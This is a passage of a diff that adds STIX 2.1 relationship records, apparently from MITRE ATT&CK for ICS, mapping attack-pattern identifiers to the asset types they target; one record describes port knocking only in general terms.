"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3471632d-253d-469e-9e8c-3b291b4ae88a", + "created": "2023-09-28T21:14:15.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:14:15.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3489c8c9-104f-478e-84ed-9801a71fe441", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--348b3df3-5580-4a04-b3c1-7e580ee98886", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--34954aa1-4cc8-4c67-9738-e944f7a824ac", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--34e4080a-7731-42da-8287-b8872b361466", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3526acc8-8834-4aaa-87a5-51e587360cf5", + "created": "2023-09-29T18:45:47.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:45:47.394Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3578dfa3-12cf-4788-aeba-e3478981177b", + "created": "2024-03-11T13:37:32.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-11T13:37:32.275Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e", + "target_ref": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3580837b-da73-42d0-9ecb-946ca28a1c8b", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3581e2cd-b8d0-40c3-93c3-c9dac770cf61", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--359d221a-33d2-4d34-b399-9a11b4e08974", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--35e5d4f4-3221-4225-b702-4a4728610e41", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--35eb4ef8-6c9f-49f8-a644-9cc4c288a4f3", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--360d95bf-4c63-4da7-b2d3-dc2b644f016c", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3613ea30-8b6e-4b0a-9dd9-5df648be78d0", + "created": "2024-06-26T15:33:30.149Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:33:30.149Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--36511991-9ac1-417a-93b2-34783e537ba3", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3653d837-365f-4197-bd5f-2ae7523e310e", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3659da9d-9336-41ec-93ae-ea3fbfd3e4a7", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--36710722-d27f-4f4c-99f3-35d46758e861", + "created": "2024-05-21T16:21:51.181Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-21T16:21:51.182Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3681481c-70b4-4cf7-b5f4-f8f4d6fd8f9f", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--368558ce-e8a6-4375-b54f-47c2ab31e38d", + "created": "2023-09-28T20:29:27.153Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:29:27.153Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--368dba6b-360d-43d3-a120-4f64b4efcd2b", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3697b350-1fa3-4885-9a5a-7bf40b3eb8ea", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--36a95914-56c4-4b3a-ac99-3bd9ff84cd7e", + "created": "2024-05-22T17:09:34.797Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:13:19.432Z", + "description": "Asset Mapping Rationale: Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question.", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--36af5323-2bd0-4927-8674-388ebd02a5c0", + "created": "2024-06-26T15:32:36.150Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:32:36.150Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--36b0321e-0bb6-4008-9109-58f28be79559", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--36c5a9df-f6a1-42d3-b3f1-e544dd856c0c", + "created": "2024-06-21T14:12:20.269Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--37048032-b41d-47d8-9c73-7b706bef24d1", + "created": "2023-09-28T20:27:58.625Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:27:58.625Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--372c2e72-d56a-4501-a3bc-31b6b0c8d0be", + "created": "2023-09-28T21:13:36.185Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:13:36.185Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--372e11a7-148a-4959-bd37-31564aa7dad9", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3731962f-64e7-4750-ac8b-40b97eef8725", + "created": "2023-09-29T16:41:15.943Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:41:15.943Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--373401c7-3081-4295-af0c-92a7fa88500e", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3745955b-d7ed-44b0-b295-120a4142faff", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--374837a0-6109-4c95-bee6-893b25ac71cf", + "created": "2023-09-28T21:13:12.715Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:13:12.715Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3765ef3e-5905-4696-b4c6-20ce84c074df", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--378b19ca-8f2f-4ede-a493-8daf14c16342", + "created": "2020-03-11T14:11:16.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6", + "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--379335f6-e49c-4c6f-9bf2-40a3f4acba84", + "created": "2024-06-26T15:28:10.675Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:28:10.675Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--379adeb0-eaf3-479d-bbf4-29d7a1c7df64", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--379dac39-5e0d-470c-9a35-de45c0db04bb", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": 